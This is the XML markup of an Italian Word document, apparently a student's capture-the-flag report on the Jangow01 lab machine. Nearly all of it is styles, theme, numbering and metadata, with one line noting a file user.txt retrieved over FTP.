      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/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7F7A07D7" wp14:editId="4F29256F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2226945</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3974465</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4386187" cy="3800475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="154362696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187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527BF96A" wp14:editId="375ED620">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-487680</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3298190</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5594657" cy="3704590"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17860554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657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nel file user.txt della cartella jangow01, scaricata tramite ftp.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D75740" w:rsidRPr="00F65593">
      <w:headerReference w:type="default" r:id="rId24"/>
      <w:footerReference w:type="default" r:id="rId25"/>
      <w:headerReference w:type="first" r:id="rId26"/>
      <w:footerReference w:type="first" r:id="rId27"/>
      <w:pgSz w:w="11907" w:h="16839" w:code="9"/>
      <w:pgMar w:top="1901" w:right="1008" w:bottom="1440" w:left="1008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63818" w14:textId="77777777" w:rsidR="001C135D" w:rsidRDefault="001C135D">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0642E71C" w14:textId="77777777" w:rsidR="001C135D" w:rsidRDefault="001C135D"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1A4DC27F" w14:textId="77777777" w:rsidR="001C135D" w:rsidRDefault="001C135D">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="342B45A6" w14:textId="77777777" w:rsidR="001C135D" w:rsidRDefault="001C135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11717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910140" w14:textId="77777777" w:rsidR="00D4304F" w:rsidRDefault="00D651B9">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
        </w:pPr>
        <w:r>
          <w:rPr>
            <w:lang w:bidi="it-IT"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:bidi="it-IT"/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:bidi="it-IT"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FF2177">
          <w:rPr>
            <w:noProof/>
            <w:lang w:bidi="it-IT"/>
          </w:rPr>
          <w:t>0</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:lang w:bidi="it-IT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02672" w14:textId="07CE9B1C" w:rsidR="00D4304F" w:rsidRPr="00021668" w:rsidRDefault="00021668">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>BW2</w:t>
    </w:r>
    <w:r w:rsidR="005A5D49" w:rsidRPr="00472A82">
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> | </w:t>
    </w:r>
    <w:r w:rsidR="00F65593">
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Jangow01 CTF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9F89B" w14:textId="77777777" w:rsidR="001C135D" w:rsidRDefault="001C135D">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75131C1C" w14:textId="77777777" w:rsidR="001C135D" w:rsidRDefault="001C135D"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="68F7C01B" w14:textId="77777777" w:rsidR="001C135D" w:rsidRDefault="001C135D">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0391BD07" w14:textId="77777777" w:rsidR="001C135D" w:rsidRDefault="001C135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BA600" w14:textId="2F938206" w:rsidR="00481BA0" w:rsidRDefault="00481BA0">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:br/>
    </w:r>
    <w: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5931" w14:textId="768D2E32" w:rsidR="005A5D49" w:rsidRPr="00F65593" w:rsidRDefault="00021668">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:color w:val="auto"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00F65593">
      <w:rPr>
        <w:color w:val="auto"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">Build week 2 – </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="00F65593">
      <w:rPr>
        <w:color w:val="auto"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Traccia</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidRPr="00F65593">
      <w:rPr>
        <w:color w:val="auto"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> 5</w:t>
    </w:r>
    <w:r w:rsidR="00F65593" w:rsidRPr="00F65593">
      <w:rPr>
        <w:color w:val="auto"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> – Bonus 1 jangow01 C</w:t>
    </w:r>
    <w:r w:rsidR="00F65593">
      <w:rPr>
        <w:color w:val="auto"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>TF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E46A11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C20FB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E92E0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98A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D90ED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D693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F2E5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7FA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590CC1C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="605"/>
        </w:tabs>
        <w:ind w:left="864" w:hanging="259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A9BAD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4B5103"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD0AC416"/>
    <w:lvl w:ilvl="0" w:tplc="1A6C1D10">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="ListNumber"/>
      <w:lvlText w:val="%1.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0456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B0429F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04090023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F1117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C1272CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="346EC5CE"/>
    <w:lvl w:ilvl="0" w:tplc="A78C31DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="605"/>
        </w:tabs>
        <w:ind w:left="864" w:hanging="25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836103"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1BB41C72"/>
    <w:lvl w:ilvl="0" w:tplc="2908863E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="864"/>
        </w:tabs>
        <w:ind w:left="864" w:hanging="259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CA2A5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4AD2C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EE43B7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="075C9506"/>
    <w:lvl w:ilvl="0" w:tplc="610C7A40">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="864"/>
        </w:tabs>
        <w:ind w:left="864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F61C5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F4A8688"/>
    <w:lvl w:ilvl="0" w:tplc="ABE84DA8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="List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00706">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="250091093">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1075279202">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1757097053">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="87117837">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1889102833">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1350522077">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="446311517">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2019623766">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1269846234">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1895197300">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1556163340">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1031612079">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1006518187">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1208646891">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="539515044">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="302776882">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1316034783">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="680740866">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="168945326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D49"/>
    <w:rsid w:val="0000795A"/>
    <w:rsid w:val="0001008C"/>
    <w:rsid w:val="00021668"/>
    <w:rsid w:val="001065E6"/>
    <w:rsid w:val="001545BD"/>
    <w:rsid w:val="001C135D"/>
    <w:rsid w:val="00212F2F"/>
    <w:rsid w:val="00227DF5"/>
    <w:rsid w:val="002D22E0"/>
    <w:rsid w:val="002F42E6"/>
    <w:rsid w:val="003008EC"/>
    <w:rsid w:val="003112E5"/>
    <w:rsid w:val="00321A95"/>
    <w:rsid w:val="00322C56"/>
    <w:rsid w:val="00472A82"/>
    <w:rsid w:val="004819A0"/>
    <w:rsid w:val="00481BA0"/>
    <w:rsid w:val="005868E4"/>
    <w:rsid w:val="005A5D49"/>
    <w:rsid w:val="00682351"/>
    <w:rsid w:val="006A55B1"/>
    <w:rsid w:val="006A7F7A"/>
    <w:rsid w:val="00727136"/>
    <w:rsid w:val="0075279C"/>
    <w:rsid w:val="007930C0"/>
    <w:rsid w:val="007A11BC"/>
    <w:rsid w:val="007B11C9"/>
    <w:rsid w:val="00873948"/>
    <w:rsid w:val="00883075"/>
    <w:rsid w:val="009C0C85"/>
    <w:rsid w:val="009F5E2B"/>
    <w:rsid w:val="00A04C67"/>
    <w:rsid w:val="00A9621A"/>
    <w:rsid w:val="00B25124"/>
    <w:rsid w:val="00B32E55"/>
    <w:rsid w:val="00B6029F"/>
    <w:rsid w:val="00B71C13"/>
    <w:rsid w:val="00C52FC2"/>
    <w:rsid w:val="00CD096D"/>
    <w:rsid w:val="00D4304F"/>
    <w:rsid w:val="00D651B9"/>
    <w:rsid w:val="00D75740"/>
    <w:rsid w:val="00DC210D"/>
    <w:rsid w:val="00E53907"/>
    <w:rsid w:val="00E6279D"/>
    <w:rsid w:val="00EC0F68"/>
    <w:rsid w:val="00EC2074"/>
    <w:rsid w:val="00EC5313"/>
    <w:rsid w:val="00F51379"/>
    <w:rsid w:val="00F65593"/>
    <w:rsid w:val="00FA006E"/>
    <w:rsid w:val="00FB431B"/>
    <w:rsid w:val="00FF2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B718D47"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E1889A09-5EBA-4859-A603-7AEFB9685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it-IT" w:eastAsia="ja-JP" w:bidi="ar-SA"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:before="160" w:after="3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31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313"/>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00EC5313"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="24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C5313"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:outlineLvl w:val="1"/>
    </w:pPr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FC2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:outlineLvl w:val="2"/>
    </w:pPr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31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72C6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31B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="180" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="1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31B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="180" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:spacing w:val="14"/>
      <w:sz w:val="26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31B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="180" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr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72C6" w:themeColor="accent1"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="0072C6" w:themeColor="accent1"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="0072C6" w:themeColor="accent1"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="0072C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6" w:themeFill="accent1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="4" w:space="0" w:color="0072C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6" w:themeColor="accent1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="0072C6" w:themeColor="accent1"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="0072C6" w:themeColor="accent1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="0072C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6" w:themeColor="accent1"/>
          <w:left w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="4" w:space="0" w:color="0072C6" w:themeColor="accent1"/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C52FC2"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr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C52FC2"/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before="0" w:after="720" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:caps/>
      <w:sz w:val="4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C5313"/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5313"/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ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="8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52FC2"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8A4203" w:themeColor="accent2" w:themeShade="80"/>
      <w:sz w:val="3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Documentoaziendale">
    <w:name w:val="Documento aziendale"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="180" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:bottom w:val="single" w:sz="6" w:space="0" w:color="0072C6" w:themeColor="accent1"/>
        <w:insideH w:val="single" w:sz="6" w:space="0" w:color="0072C6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FDF9F7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72C6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0072C6" w:themeColor="accent1"/>
        <w:sz w:val="24"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:pPr>
        <w:wordWrap/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:tblStyle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spacing w:val="1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pacing w:val="14"/>
      <w:sz w:val="2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0072C6" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C52FC2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="8A4203" w:themeColor="accent2" w:themeShade="8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52FC2"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="8A4203" w:themeColor="accent2" w:themeShade="8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0072C6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i/>
      <w:caps/>
      <w:smallCaps w:val="0"/>
      <w:color w:val="0072C6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0072C6" w:themeColor="accent1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olor w:val="0072C6" w:themeColor="accent1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B431B"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="2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after="0" w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="84"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00EC0F68"/>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="8" w:color="0072C6" w:themeColor="accent1"/>
        <w:left w:val="single" w:sz="4" w:space="31" w:color="0072C6" w:themeColor="accent1"/>
        <w:bottom w:val="single" w:sz="4" w:space="8" w:color="0072C6" w:themeColor="accent1"/>
        <w:right w:val="single" w:sz="4" w:space="31" w:color="0072C6" w:themeColor="accent1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="0072C6" w:themeFill="accent1"/>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr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rPr>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:shd w:val="clear" w:color="auto" w:fill="0072C6" w:themeFill="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:unhideWhenUsed/>
    <w:qFormat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0072C6" w:themeColor="accent1"/>
      <w:sz w:val="40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hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0072C6" w:themeColor="accent1"/>
      <w:sz w:val="4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52FC2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="8A4203" w:themeColor="accent2" w:themeShade="80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ListNumber">
    <w:name w:val="List Number"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr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0072C6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431B"/>
    <w:pPr>
      <w:spacing w:before="0"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B431B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B431B"/>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/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B431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431B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4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431B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"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B431B"/>
    <w:pPr>
      <w:spacing w:before="0"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B431B"/>
    <w:pPr>
      <w:spacing w:before="0"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FB431B"/>
    <w:pPr>
      <w:spacing w:before="0"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B431B"/>
    <w:pPr>
      <w:spacing w:before="0"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B431B"/>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6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431B"/>
    <w:pPr>
      <w:spacing w:before="0"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FB4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color w:val="595959" w:themeColor="text1" w:themeTint="A6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B431B"/>
    <w:pPr>
      <w:spacing w:before="0"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B431B"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="22"/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C0F68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C0F68"/>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="22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1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chael\AppData\Roaming\Microsoft\Templates\Documento%20aziendale.dotx" TargetMode="External"/></Relationships>
</file>

<file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="Business">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="0C1227"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FDF9F7"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0072C6"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="F98723"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="DC3C00"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="F9CB23"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="009E49"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="79498B"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0072C6"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="79498B"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Georgia-Arial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Documento aziendale.dotx</Template>
  <TotalTime>82</TotalTime>
  <Pages>7</Pages>
  <Words>684</Words>
  <Characters>3899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994</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Michael 994</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <cp:lastPrinted>2026-03-11T14:15:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-16T14:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-21T13:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>